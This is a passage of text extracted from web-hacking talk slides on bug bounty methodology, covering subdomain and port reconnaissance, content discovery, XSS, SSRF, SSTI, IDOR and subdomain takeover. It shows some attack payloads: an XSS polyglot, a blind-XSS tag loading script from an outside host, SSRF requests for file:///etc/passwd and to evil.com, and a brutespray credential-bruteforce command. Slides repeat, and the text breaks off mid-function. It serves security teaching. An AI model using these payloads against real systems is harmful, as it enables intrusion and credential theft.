6,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,2
4800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,425
10,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848
,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389,280,4567,7001,8008,9080 -iL
$TARGET_LIST --max-rate 100000 -oG $TARGET_OUTPUT

nmap zzz

Visual Identification

★ Because of the nature of scraping and dns redirects some sites will
be gone or the same.
★ Gotta get an idea of what is up and unique
★ We also don’t know what protocol these are on (http vs https, ++)
Auxiliary
★ Dnssec / nsec / nsec3 walking
○ Ldnsutils, nsec3walker, nsec3map
★ Github recon
○ Search for goodies
https://github.com/appsecco/bugcrowd-levelup-subdomain-enumeration/blob/master/esoteric_subdomain_enumeration_techniques.pdf
★ Burp suite scope filters
○ Simple and effective
○ Start with target, spider, scope down to keywords, repeat
https://www.youtube.com/watch?v=1Kg0_53ZEq8
★ Dorking: ads key, priv pol, tos, aws, s3
Linked Discovery - BURP SUITE (DEMO)
Platform Identification and CVE searching
Content Discovery / Directory Bruting

❏ Seclists / RAFT / Digger wordlists
❏ Patator
❏ WPScan
❏ cmsmap

★ Gobuster
★ Burp content discovery
★ Robots disallowed
★ ¯\_(ツ)_/¯
Parameter Bruting?
★ Yep! - Untested but love the idea
★ Can be combined with backslash scanners top 2500 params
Automation?
★ Somewhat
★ Best-in-breed tools/sites change,
automation needs to support bespoke tooling

★ HODOR:
○ A security testing Slackbot built with a
Kubernetes backend on the Google Cloud
Platform
★ Kubebot:
○ A security testing Slackbot built with a
Kubernetes backend on the Google Cloud
Platform
★ Assetnote
★ Datasploit & intrigue
QUICK BASH WINS (hostme.sh)
QUICK BASH WINS (rundns.sh)
QUICK BASH WINS (bust.sh)
QUICK BASH WINS (mass.sh)
QUICK BASH WINS (certspotter.sh)
#!/bin/bash

#curl https://certspotter.com/api/v0/certs\?domain\=$1 | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | uniq | dig +short -f - | uniq | nmap -T5 -Pn -sS -i - -p 80,443,21,22,8080,8081,8443 --open -n -oG -

#curl https://certspotter.com/api/v0/certs\?domain\=luminate.com | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | uniq | dig +short -f - | uniq | nmap -T5 -Pn -sS -i - -p 80,443,21,22,8080,8081,8443 --open -n -oG -

# Pull every name from certificates issued for the domain, strip quotes and
# wildcard prefixes, and dedupe. sort -u rather than uniq: uniq only drops
# adjacent repeats, and the API does not return the names sorted.
curl https://certspotter.com/api/v0/certs\?domain\=$1 | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u
Ty Jobert!
The Bug Hunters
Methodology v2.1
whoami

★ Jason Haddix - @jhaddix


★ VP of Trust and Security @Bugcrowd
★ 2014-2015 top hunter on Bugcrowd (Top 20 currently)
★ Father, hacker, blogger, gamer!
What this talk is about...

Hack
Stuff
Better
(and practically)
And…LOTS of memes…. only some are funny
history && topics

Aka “How to Shot Web” @ DEFCON23
★ philosophy shifts
★ discovery techniques
★ mapping methodology
★ parameters oft attacked
★ useful fuzz strings
★ bypass or filter evasion techniques
★ new/awesome tooling
★ memes

★ Subdomain & Discovery
★ SQLi
★ XSS
★ File Uploads
★ CSRF
★ Privilege, Auth, IDOR

v2

★ MOAR discovery
★ xss
★ ssti
★ ssrf
★ Code Inj / cmdi / advancements in fuzzing
★ Infrastructure and config
★ WAF
★ SOAP Testing

light reading
Discovering New Targets
Discovery

TBHMv1
❏ Intro to scraping for subdomains
❏ Enumall (recon-ng, Alt-DNS wrapper)
❏ Nmap Standard

★ (sub Scraping) Sublist3r
○ brutesubs
★ (sub bruting) MaSSDNS ++
○ all.txt list
★ (port scanning) MASSCAN ++
○ Asn + nmap style
Sublist3r

★ Plazmaz Fork
★ Fleetcaptain fork
Acquisitions

★ Crunchbase
★ wikipedia

Interlude... credential bruteforce

masscan -> Nmap service scan (-oG) -> Brutespray credential bruteforce
Visual Identification

★ Because of the nature of scraping and dns redirects some sites will be gone or the same.
★ Gotta get an idea of what is up and unique
★ We also don’t know what protocol these are on (http vs https, ++)
On App Discovery
WALKING & UNDERSTAND THE APP
Platform Identification
and CVE searching
TBHMv1
Coverage for Heavy js sites

★ ZAP Ajax Spider


★ Jsparser
★ linkfinder
jsparser
Linkfinder
Content Discovery /
Directory Bruting
TBHMv1
❏ Seclists / RAFT / Digger wordlists
❏ Patator
❏ WPScan
❏ cmsmap

★ Gobuster
★ Burp content discovery
★ Robots disallowed
★ ¯\_(ツ)_/¯
CommonSpeak and
Scans.io data

★ Subdomain data is
awesome
Parameter Bruting?
★ Yep! - Untested but love the idea
★ Can be combined with backslash scanners top 2500 alexa params
Identify IPs and main TLDs (ASNs, Reverse Whois, Acquisitions, ++)
-> Domain scraping for discovered TLDs (enumall, sublist3r, ++)
-> Domain bruteforcing, Resolve && add new IP ranges (Massdns)
-> Portscan (masscan)
-> Visual Identification (eyewitness, Manual)
-> Platform Identification (Builtwith, Wappalyzer, ++)
-> Content Discovery (Patator or gobuster, Wordlists, Burp)
-> Parameter discovery (Parameth, Burp analyze target)
XSS
XSS (not a lot)
TBHMv1
❏ polyglots
❏ Seclists (what up dan!)
❏ Flash
❏ Common input vectors
★ Blind XSS Frameworks
○ Sleepy Puppy (python)
○ XSS Hunter (python)
○ Ground control (Ruby)(small)
★ Polyglots
★ Xss mindmap
Blind XSS (diagram)

1. Jamie: I really enjoy my super admin access this morning !!!
2. Frans: I really enjoy my NEW super admin access this morning !!! “><script src=//y.vg></script>
3. Y.vg is a javascript shell !!#!
XSSHunter
Payload:

★ The vulnerable page's URI
★ Origin of Execution
★ The Victim's IP Address
★ The Page Referer
★ The Victim's User Agent
★ All Non-HTTP-Only Cookies
★ The Page's Full HTML DOM
★ Full Screenshot of the Affected Page
★ Responsible HTTP Request (If an XSS Hunter compatible tool is used)
★ Nod to beef & XSShell
XSS Polyglot #4

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
Jackmasa’s XSS Mindmap

https://github.com/jhaddix/XSS.png
Server Side Template
Injection
SSTI
TBHMv1
❏ Nothing

Core Idea: Does the application utilize a template engine? ++


★ Engine identification
○ WAPPalyzer + BuiltWith + Vulners scanner
○ Test fuzzing
○ Tooling
○ TPLmap + tplmap Burp Extension
○ Backslash powered scanner?
★ Resources
SSTI
SSTI Tooling
Server Side Template Injection & Logic / Debug parameters

{regex + perm} template, content, preview, redirect, id, view, activity, name

http://acme.com/script?name={{2*3}}
Server Side Request Forgery
SSRF Common Parameters or Injection points from TBHMv1

TBHMv1
❏ Nothing
❏ Well kinda... SSRF (visually) looks very similar to LFI / RFI / Path/dir Traversal!
❏ REMIX!

★ Where?
★ Resources
○ SSRF Bible (black magic)
★ Exploit
○ Burp Collaborator
★ Honourable mention:
○ ^ “Blind detection of path traversal-vulnerable file uploads”

Common parameters: file= folder= location= style= locale= template= path= doc= display= source= load= pdf= read= dest= retrieve= continue=
SSRF (GET examples)
http://ACME.com/redirect.php?url=http://google.com
http://ACME.com/redirect.php?url=//google.com
http://ACME.com/redirect.php?url=google.com
http://ACME.com/redirect.php?url=/PATH/SOMETHING/here

http://ACME.com/redirect.php?url=file:///etc/passwd
http://acme.com/ssrf.php?url=tftp://evil.com:12346/TESTPACKET
SSRF Resources

★ protocol and schema mappings
★ Exploit examples
Server Side Request Forgery

Many on the File Includes / Dir Traversal table

{regex + perm} dest, {regex} redirect, {regex + perm} uri, {regex} path, {regex} continue, {regex + perm} url, {regex} window, {regex} next, {regex} data, {regex} reference, {regex + perm} site, {regex} html, {regex + perm} val, {regex} validate, {regex} domain, {regex} callback, {regex} return, {regex + perm} page, {regex} feed, {regex} host, {regex} port

http://acme.com/script?uri=ftp://site
Code Inj, CDMi, & Future Fuzzing, ++
Code Injection + CMD Injection + New Fuzzing

TBHMv1
❏ Sqli
❏ Polyglot
❏ Seclists
❏ Sqlmap
❏ Params
❏ Tooling
❏ resources

★ Commix
○ CMDi
○ Supports php code inj
★ Unknown Identification
○ Backslash Powered Scanner
★ resources
○ albinowax (James Kettle)
IDOR - MFLAC

★ IDs
★ Hashes
★ Emails

Insecure Direct Object Reference

{regex + perm} id, {regex + perm} user, {regex + perm} account, {regex + perm} number, {regex + perm} order, {regex + perm} no, {regex + perm} doc, {regex + perm} key, {regex + perm} email, {regex + perm} group, {regex + perm} profile, {regex + perm} edit, REST numeric paths

http://acme.com/script?user=21856
Code Injection + CMD
Injection
★ Commix pros
○ Command injection
○ Supports php code inj
○ Custom modules
○ PS & PY shells
○ Put many memes in their slides
Backslash Powered Scanner
★ Generic payloads for any stack
○ Send a ‘ get an error
○ Send a \‘ and the backslash escapes your injection character
★ Multi-tiered, Simple, and effective response analyzing
○ Response code
○ Response size
○ keywords
★ Watch the video then read the paper =)
○ https://broadcast.comdi.com/r7rwcspee75eewbu8a0f
○ http://blog.portswigger.net/2016/11/backslash-powered-scanning-hunting.html
Infrastructure & Config
Subdomain takeover!

★ Pretty simple, check for cnames that resolve to these services, if the service has lapsed, register and profit!
Subdomain Takeover
Robbing Misconfigured Sh** (AWS)
Robbing Misconfigured Sh** (git)
WAF
★ Often on newer websites we are hampered by WAF or CDN vendors security products
○ Cloudflare and Akamai
○ Dedicated WAFs
★ Solutions:
○ Encoding (meh)
○ Finding origin
○ Finding Dev
★ https://twitter.com/jhaddix/status/908044285437726726?lang=en
What’s in a name?

★ Dev.domain.com
★ Stage.domain.com
★ ww1/ww2/ww3...domain.com
★ www.domain.uk/jp/...
★ ...

★ https://twitter.com/Jhaddix/status/964714566910279680
SOAP Services
Bespoke .nfo
Bespoke .nfo
resources!
SSRF Resources

Pivoting from blind SSRF to RCE with HashiCorp Consul - Peter Adkins
http://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF-to-RCE-with-Hashicorp-Consul.html

Exploiting Server Side Request Forgery on a Node/Express Application (hosted on Amazon EC2) - Seth Art
https://sethsec.blogspot.com/2015/12/exploiting-server-side-request-forgery.html

Server-side browsing considered harmful - Nicolas Grégoire
http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf

How To: Server-Side Request Forgery (SSRF) - Jobert Abma
https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF

Escalating XSS in PhantomJS Image Rendering to SSRF/Local-File Read - Brett Buerhaus
http://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/

Burp, Collaborate, and Listen: A Pentester Reviews the Latest Burp Suite Addition - Max Zinkus
https://www.bishopfox.com/blog/2016/02/burp-collaborate-listen-pentester-reviews-latest-burp-suite-addition/
CommInj Resources
SSTI Resources

SSTI Original Whitepaper - James Kettle
http://blog.portswigger.net/2015/08/server-side-template-injection.html

OWASP SSTI Workshop - Gérôme Dieu
https://speakerdeck.com/owaspmontreal/workshop-server-side-template-injection-ssti

Exploring SSTI in Flask/Jinja2 - Tim Tomes
https://www.lanmaster53.com/2016/03/exploring-ssti-flask-jinja2/
https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/

Injecting Flask - Ryan Reid
https://nvisium.com/blog/2015/12/07/injecting-flask/

Hi Pete!

Rails Dynamic Render to RCE (CVE-2016-0752) - John Poulin
https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/

uber.com may RCE by Flask Jinja2 Template Injection - Orange Tsai
https://hackerone.com/reports/125980
Links

Peter Yaworski https://leanpub.com/web-hacking-101
Andy Gill https://leanpub.com/ltr101-breaking-into-infosec
aboul3la https://github.com/aboul3la/Sublist3r
jhaddix https://github.com/jhaddix/domain
Tim Tomes https://bitbucket.org/LaNMaSteR53/recon-ng
@infosec_au & @nnwakelam https://github.com/infosec-au/altdns
blechschmidt https://github.com/blechschmidt/massdns
robertdavidgraham https://github.com/robertdavidgraham/masscan
jhaddix - all.txt https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056
anshumanbh https://github.com/anshumanbh/brutesubs
OJ Reeves https://github.com/OJ/gobuster

Links

epinna https://github.com/epinna/tplmap
https://github.com/mak-/parameth
https://gist.github.com/anshumanbh/96a0b81dfe318e9e956013209e178fa9
https://github.com/ChrisTruncer/EyeWitness
https://github.com/jackmasa/XSS.png
https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056
https://github.com/lorenzog/dns-parallel-prober

Links

SSRF Bible https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit#
https://github.com/ewilded/psychoPATH
https://github.com/commixproject/commix

Links

https://github.com/qazbnm456/awesome-web-security
https://github.com/infoslack/awesome-web-hacking
https://github.com/djadmin/awesome-bug-bounty
Jason Haddix - @jhaddix
jhaddix@bugcrowd.com
The Bug Hunters
Methodology v3(ish)

Video: https://www.youtube.com/watch?v=Qw1nNPiH_Go
whoami

★ Jason Haddix - @jhaddix


★ VP of Trust and Security @Bugcrowd
★ 2014-2015 top on Bugcrowd (Top 20 currently)
★ Father, hacker, blogger, gamer!
What this talk is about...

history && topics

Aka “How to Shot Web” @ DEFCON23

(still) light reading
Discovering IP Space
ASN’s

★ autonomous system number - http://bgp.he.net


ARIN & RIPE

★ https://whois.arin.net/ui/query.do
★ https://apps.db.ripe.net/db-web-ui/#/fulltextsearch
Rev whois

★ https://reverse.report/
Shodan Organization
★ https://www.shodan.io/search?query=org%3A%22Tesla+Motors%22
Discovering New Targets
(Brands & TLDs)
Brand / TLD Discovery

Brand Acquisitions Discovery
★ Wikipedia the ORG
★ Crunchbase Acquisitions section

Linked Discovery
★ *BURP* Spidering

Weighted Link and REVERSE TRACKER analysis
★ DomLink
★ bUILTWITH

Acquisitions
Linked Discovery (Burp Demo)

1) Turn off passive scanning


2) Set forms auto to submit (if you’re feeling frisky)
3) Set scope to advanced control and use string of target name (not a normal FQDN)
4) Walk+browse, then spider all hosts recursively!
5) Profit (more targets)!
DomLink

Vincent Yiu @vysecurity


Builtwith
Builtwith
Others

★ Trademark In Google: "Tesla © 2016" "Tesla © 2015" "Tesla © 2017" inurl:tesla


Discovering New Targets
(Subdomains)
Subdomain Scraping

It’s all about sources


Sublist3r Amass
● Amass by jeff Foley - @jeff_foley
● https://github.com/caffix/amass
● Includes reverse DNS methods
● Includes permutation scanning:
○ dev-1.netflix.com, Dev-2.netflix.com

root@Test2:~/tools/amass# cat amass.sh

#!/bin/bash
# usage: ./amass.sh target.com -- one output directory per target, run from /root/tools/amass
mkdir -p "$1"
touch "$1/$1.txt"
amass -active -d "$1" | tee "/root/tools/amass/$1/$1.txt"
Sublist3r Subfinder
● Subfinder by ICEMAN
● https://github.com/ice3man543/subfinder
● Json output, multi resolver for bruteforce, ++

root@Test2:~/tools/subfinder# cat subfinder.sh

#!/bin/bash
# usage: ./subfinder.sh target.com -- one output directory per target, run from /root/tools/subfinder
mkdir -p "$1"
touch "$1/$1.txt"
subfinder -d "$1" | tee "/root/tools/subfinder/$1/$1.txt"
Fancy table referencing runtimes ++

amass | Both | subfinder
JUST USE BOTH

I Don’t use anymore:


● Enumall / Recon-NG (not great on sources or speed)
● Aquatone (not great on sources) but aquatone-scan is useful
● Sublist3r (same as above)
● Anything else for scraping
● ClouDflare Enum (although sometimes i think about it)
○ https://github.com/mandatoryprogrammer/cloudflare_enum
Subdomain Brute Forcing

1,136,964 line subdomain dictionary (all.txt)

Tool | Time to run | Threads | Found ?
subbrute | errored | 100 | 0
  time ./subbrute.py -c 100 all.txt $TARGET.com | tee subbrute.output
gobuster | 21m15.857s | 100 | 87
  time gobuster -m dns -u $TARGET.com -t 100 -w all.txt
massdns | 1m24.167 | n/a | 213
  time ./subbrute.py /root/work/bin/all.txt $TARGET.com | ./bin/massdns -r resolvers.txt -t A -a -o -w massdns_output.txt -
dns-parallel-prober | 42m2.868s | 100 | 43
  time python dns-queue.py $TARGET.com 100 $TARGET_outputfile -i /root/work/bin/all.txt
blacksheepwall | 256m9.385s | 100 | 61
  time ./blacksheepwall_linux_amd64 -clean -dictionary /root/work/bin/all.txt -domain $TARGET.com
Sub Bruting

With Massdns (or subfinder), why not all of them?

all.txt

https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056
CommonSpeak and
Scans.io data

★ Subdomain data is awesome


★ URL data has been less useful
Auxiliary
★ Dnssec / nsec / nsec3 walking
○ Ldnsutils, nsec3walker, nsec3map
★ Github recon
○ Search for goodies
https://github.com/appsecco/bugcrowd-levelup-subdomain-enumeration/blob/master/esoteric_subdomain_enumeration_techniques.pdf
★ Dorking: ads key, priv pol, tos, aws, s3
https://www.youtube.com/watch?v=1Kg0_53ZEq8
Enumerating Targets
Port Scanning

65536 unverified Hosts (a large target’s ASN)

Tool | Time to run | Found
Masscan | 11m4.164s | 196
  masscan -p1-65535 -iL $TARGET_LIST --max-rate 10000 -oG $TARGET_OUTPUT
nmap | zzz

#!/bin/bash
# usage: ./scan.sh https://host.example -- strips the scheme, shows the host record, masscans the first A record
strip=$(echo "$1" | sed 's/https\?:\/\///')
echo ""
echo "##################################################"
host "$strip"
echo "##################################################"
echo ""
ip=$(dig +short "$strip" | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" | head -1)
# ${strip}_scan: the original $strip_scan expanded to an (unset) variable named strip_scan, so tee wrote no file
masscan -p1-65535 "$ip" --max-rate 1000 |& tee "${strip}_scan"
Credential bruteforce

masscan -> Nmap service scan (-oG) -> Brutespray credential bruteforce

Brutespray: https://github.com/x90skysn3k/brutespray

python brutespray.py --file nmap.gnmap -U /usr/share/wordlist/user.txt -P /usr/share/wordlist/pass.txt --threads 5 --hosts 5
Visual Identification

★ Because of the nature of scraping and dns redirects some sites will be
gone or the same.
★ Gotta get an idea of what is up and unique
★ We also don’t know what protocol these are on (http vs https, ++)
Aquatone? Httpscreenshot?
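Feeding the visual-identification step: an added example, not from the talk, that turns Nmap grepable output (-oG, the same file brutespray reads) into a URL list for a screenshot tool. The scheme comes from nmap's service name where -sV ran and is guessed from the port otherwise; the sample scan below is constructed.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample of Nmap grepable output (-oG); not a real scan.
SAMPLE_GNMAP = """\
# Nmap 7.70 scan initiated as: nmap -sV -oG scan.gnmap -iL hosts.txt
Host: 192.0.2.10 (www.example.test)\tStatus: Up
Host: 192.0.2.10 (www.example.test)\tPorts: 22/open/tcp//ssh//OpenSSH 7.4/, 80/open/tcp//http//nginx/, 443/open/tcp//ssl|http//nginx/\tIgnored State: closed (997)
Host: 192.0.2.11 ()\tPorts: 8080/open/tcp//http-proxy///, 8443/open/tcp/////, 3306/filtered/tcp//mysql///
Host: 192.0.2.12 (dev.example.test)\tPorts: 9090/open/tcp//ssl|http//Jenkins/, 5432/closed/tcp//postgresql///
# Nmap done at Mon Jan  1 00:00:00 2018 -- 3 IP addresses (3 hosts up) scanned
"""

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)")
PORTS_RE = re.compile(r"Ports:\s+([^\t]*)")

# Port-based fallback used only when nmap recorded no service name.
HTTPS_PORTS = {443, 8443, 9443, 4443}
HTTP_PORTS = {80, 8080, 8000, 8081, 8888, 8180}


def parse_gnmap(text: str) -> List[Tuple[str, str, int, str]]:
    """Return (ip, hostname, port, service) for every open TCP port in a -oG file."""
    results = []
    for line in text.splitlines():
        m = HOST_RE.match(line)
        p = PORTS_RE.search(line)
        if not m or not p:
            continue  # comment lines and Status-only host lines carry no ports
        ip, name = m.group(1), m.group(2)
        for entry in p.group(1).split(", "):
            # gnmap field order: port/state/protocol/owner/service/rpc info/version/
            fields = entry.split("/")
            if len(fields) < 5:
                continue
            port, state, proto, service = fields[0], fields[1], fields[2], fields[4]
            if state != "open" or proto != "tcp":
                continue
            results.append((ip, name, int(port), service))
    return results


def guess_scheme(port: int, service: str) -> Optional[str]:
    """http or https from nmap's service name first, then from the port; None means not a web port."""
    if "ssl" in service or "https" in service:   # nmap writes tunnelled services as ssl|http
        return "https"
    if service.startswith("http"):                # http, http-proxy, http-alt, ...
        return "http"
    if port in HTTPS_PORTS:
        return "https"
    if port in HTTP_PORTS:
        return "http"
    return None


def web_urls(text: str) -> List[str]:
    """URLs to hand to a screenshot tool, preferring the hostname nmap recorded over the bare IP."""
    urls = []
    for ip, name, port, service in parse_gnmap(text):
        scheme = guess_scheme(port, service)
        if scheme is None:
            continue
        host = name or ip
        default = 443 if scheme == "https" else 80
        urls.append(f"{scheme}://{host}" if port == default else f"{scheme}://{host}:{port}")
    return urls


if __name__ == "__main__":
    print("\n".join(web_urls(SAMPLE_GNMAP)))
```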
Wayback Enumeration
TIME OUT
Xmind Organization

★ Green w/ checkmark is Done


★ Orange is in progress
★ Red is vulnerable
Demo
Platform Identification
and CVE searching
TBHMv1
Parsing JavaScript
Coverage for Heavy js sites

★ ZAP Ajax Spider


★ Jsparser
★ linkfinder
Linkfinder
jsparser
Feeding these tools
Content Discovery
Content Discovery /
Directory Bruting
TBHMv1
❏ Seclists / RAFT / Digger wordlists
❏ Patator
❏ WPScan
❏ cmsmap

★ Gobuster
★ Burp content discovery
★ Robots disallowed
★ ¯\_(ツ)_/¯
Content Discovery / Directory Bruting

★ https://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10
★ But still gold
Parameter Bruting?
★ Yep! - Untested but love the idea
★ Can be combined with backslash scanners top 2500 alexa params
Identify IPs and main TLDs (ASNs, Reverse Whois, Acquisitions, ++)
-> Domain scraping for discovered TLDs (amass, subfinder, ++)
-> Domain bruteforcing, Resolve && add new IP ranges (Massdns)
-> Portscan (masscan)
-> Visual Identification (eyewitness, Manual)
-> Platform Identification (Builtwith, Wappalyzer, ++)
-> Content Discovery (gobuster, Wordlists, Burp)
-> Parameter discovery (Parameth, Burp analyze target)
XSS
Blind XSS Frameworks Continued!

SMS Support
Server Side Request
Forgery
What to do with SSRF?
https://gist.github.com/jhaddix/78cece26c91c6263653f31ba453e273b
Insecure direct object reference
IDOR - MFLAC

★ IDs
★ Hashes
★ Emails

Insecure Direct Object Reference

{regex + perm} id, {regex + perm} user, {regex + perm} account, {regex + perm} number, {regex + perm} order, {regex + perm} no, {regex + perm} doc, {regex + perm} key, {regex + perm} email, {regex + perm} group, {regex + perm} profile, {regex + perm} edit, REST numeric paths

http://acme.com/script?user=21856
Infrastructure & Config
Subdomain takeover!

★ Pretty simple, check for cnames that resolve to these services, if the service has lapsed, register and profit!
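The same check from the defender's side, as an added example that is not part of either deck: audit your own zone's CNAMEs for targets that no longer resolve or that a third-party host reports as unclaimed (what tko-subs automates against a target). DNS and HTTP are stubbed with constructed data so it runs offline; the service fingerprints are assumed for illustration and should be verified against each provider.

```python
from typing import Callable, Dict, List, NamedTuple, Optional


class Finding(NamedTuple):
    record: str   # our name (the CNAME owner)
    target: str   # where it points
    reason: str


# Third-party hosts commonly pointed at by CNAME and the text each returns for an
# unclaimed name. Illustrative fingerprints, assumed here: verify against your provider.
SERVICE_FINGERPRINTS: Dict[str, str] = {
    "s3.amazonaws.com": "NoSuchBucket",
    "github.io": "There isn't a GitHub Pages site here",
    "herokuapp.com": "No such app",
}

# Constructed zone excerpt (not a real zone): record -> CNAME target.
ZONE_CNAMES: Dict[str, str] = {
    "blog.example.test": "example-blog.github.io",
    "shop.example.test": "example-shop.herokuapp.com",
    "assets.example.test": "example-assets.s3.amazonaws.com",
    "old.example.test": "legacy.retired-saas.example",
    "www.example.test": "lb-1234.example-cdn.test",
}

# Constructed stand-ins for DNS and HTTP so the audit runs offline. A missing key means
# NXDOMAIN (DNS) or no answer (HTTP). A live run would resolve the target and request the
# record name itself, so the provider sees the Host header it routes on.
FAKE_DNS: Dict[str, str] = {
    "example-blog.github.io": "192.0.2.20",
    "example-shop.herokuapp.com": "192.0.2.21",
    "example-assets.s3.amazonaws.com": "192.0.2.22",
    "lb-1234.example-cdn.test": "192.0.2.23",
}
FAKE_HTTP: Dict[str, str] = {
    "example-blog.github.io": "<h1>My blog</h1>",
    "example-shop.herokuapp.com": "<p>No such app</p>",
    "example-assets.s3.amazonaws.com": "<Error><Code>NoSuchBucket</Code></Error>",
    "lb-1234.example-cdn.test": "<h1>Welcome</h1>",
}


def service_for(target: str) -> Optional[str]:
    """Match on the DNS suffix, not a substring: github.io.evil.test is not GitHub."""
    for suffix in SERVICE_FINGERPRINTS:
        if target == suffix or target.endswith("." + suffix):
            return suffix
    return None


def audit(zone: Dict[str, str],
          resolve: Callable[[str], Optional[str]],
          fetch: Callable[[str], Optional[str]]) -> List[Finding]:
    """Flag CNAMEs whose target is gone or whose hosting service says the name is unclaimed."""
    findings: List[Finding] = []
    for record, target in sorted(zone.items()):
        if resolve(target) is None:
            findings.append(Finding(record, target, "CNAME target does not resolve (NXDOMAIN)"))
            continue
        service = service_for(target)
        if service is None:
            continue  # first-party or unknown host: nothing to fingerprint
        body = fetch(target) or ""
        if SERVICE_FINGERPRINTS[service] in body:
            findings.append(Finding(record, target, f"unclaimed resource on {service}"))
    return findings


if __name__ == "__main__":
    for f in audit(ZONE_CNAMES, FAKE_DNS.get, FAKE_HTTP.get):
        print(f"{f.record} -> {f.target}: {f.reason}")
```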
Subdomain Takeover
Robbing Misconfigured Sh** (AWS)
WAF
★ Often on newer websites we are hampered by WAF or CDN vendors security products
○ Cloudflare and Akamai
○ Dedicated WAFs
★ Solutions:
○ Encoding (meh)
○ Finding origin
○ Finding Dev
★ https://twitter.com/jhaddix/status/908044285437726726?lang=en
What’s in a name?

★ Dev.domain.com
★ Stage.domain.com
★ ww1/ww2/ww3...domain.com
★ www.domain.uk/jp/...
★ ...

★ https://twitter.com/Jhaddix/status/964714566910279680
The future of TBHM
Old

Aka “How to Shot Web” @ DEFCON23


New! Bugcrowd University
It's the Little Things II
Exploiting Vulnerabilities Through Proper Reconnaissance

Ben Sadeghipour (@Nahamsec)


Intro

● Researcher, pentester, hacker, and bug bounty participant
● Hacker Operations Lead at HackerOne
● 600+ valid vulnerabilities to ~100 companies on HackerOne (Department of Defense, Airbnb, Oath/Yahoo, Snapchat, Valve, Zendesk, etc.)
● Bug Bounty Forum co-founder (@bugbountyforum)

2 @nahamsec
AGENDA
1. Overview
2. Asset Discovery
3. Content Discovery
4. Automation
5. Digital Dumpster Diving
6. Real Life Examples
Why?

● Self improvement
● Networking
● My career was built / boosted thanks to bug bounties
● Competition makes it more fun
● … who doesn’t like extra cash?
Reconnaissance

Recon (Definition)
In military operations, reconnaissance or scouting is the exploration outside an area occupied by friendly forces to gain information about natural features and other activities in the area.

Recon (Definition)
● Understanding how the application is built
● Understanding how the application processes data
● Finding all possible “entry” points or company assets
● and finding as many files, folders, or endpoints
Asset Discovery

● Brute force
● Find different environments (.dev, .corp, .stage, uat, etc.)
● Brute force again
○ Different permutations
○ Different environment
■ dashboard.dev.site.com vs dashboard-dev.site.com

Google Dork: site.com +inurl:dev -cdn

Tools:
● sublist3r
● enumall
● massdns
● altdns
● brutesubs
● dns-parallel-prober
● dnscan
● knockpy
● tko-subs
● HostileSubBruteforce
Certificate Transparency
How do you find more?

Censys
● Look for SSL certificates:
○ Example: 443.https.tls.certificate.parsed.extensions.subject_alt_name.dns_names:snapchat.com

Shodan

● Search by hostname
● Filter for
○ Ports: 8443, 8080, 8180, etc
○ Title: “Dashboard [Jenkins]”
○ Product:Tomcat
○ Hostname: somecorp.com
○ Org: evilcorp
○ ssl: Google

Certspotter
● Great API
● Easy to automate: We’ll get to this later
○ Make a bash alias
○ Automate
○ Win

Crt.sh
● Great API and web interface
● Allows using a wild card
● Sometimes you get different results from different sources

Search query: Identity LIKE 'www.snapchat.%'

https://crt.sh/?q=www.snapchat.%

$ curl 'https://crt.sh/?q=%.'$1'&output=json' | jq '.name_value' | sed 's/\"//g' | sed 's/\*\.//g'
OSINT
What about other properties?

Acquisitions

● Usually in scope (after 6 months)
● Geared towards bigger companies: Facebook, Google, Yahoo, etc.

ARIN

Shodan also helps with this

Content Discovery
Where the fun begins
Content Discovery

● Port scan
● Screenshot open ports (default: 80, 443)
● Look for interesting
○ Files
○ Directories

Example
● You see an open port on example.com:8433
● Directory brute force
● /admin/ returns 403
● You brute force for more files/directories on /admin/
● /admin/users.php returns 200
● Repeat on other domains, ports, folders, etc.
Content Discovery
● Nmap common ports (3868,3366,8443,8080,9443,9091,3000,8000,5900,8081,6000,10000,8181,3306,5000,4000,8888,5432,15672,9999,161,4044,7077,4040,9000,8089,443,7447,7080,8880,8983,5673,7443)
● Take screenshots (webscreenshot.py)
● Directory/File brute force
○ dirbuster
○ gograbber
○ gobuster
○ dirsearch
○ Probably more tools out there?
● Robots.txt sometimes does this for you ¯\_(ツ)_/¯

Content Discovery
● ALWAYS keep an archive of your reports..
Automation

AWS Recon

● Look for S3 buckets on Google (site:s3.amazonaws.com + inurl:company_name )
● AWS instances (site:amazonaws.com -s3)
● Repeat on Github!
● Automate your work...

S3 Automation

Certspotter
● Great API
● Easy to automate:
○ Make an alias
○ Automate
○ Win
Create aliases

certspotter(){
  # one working directory per target domain (the redirect below fails if it does not exist)
  mkdir -p ~/"$1"
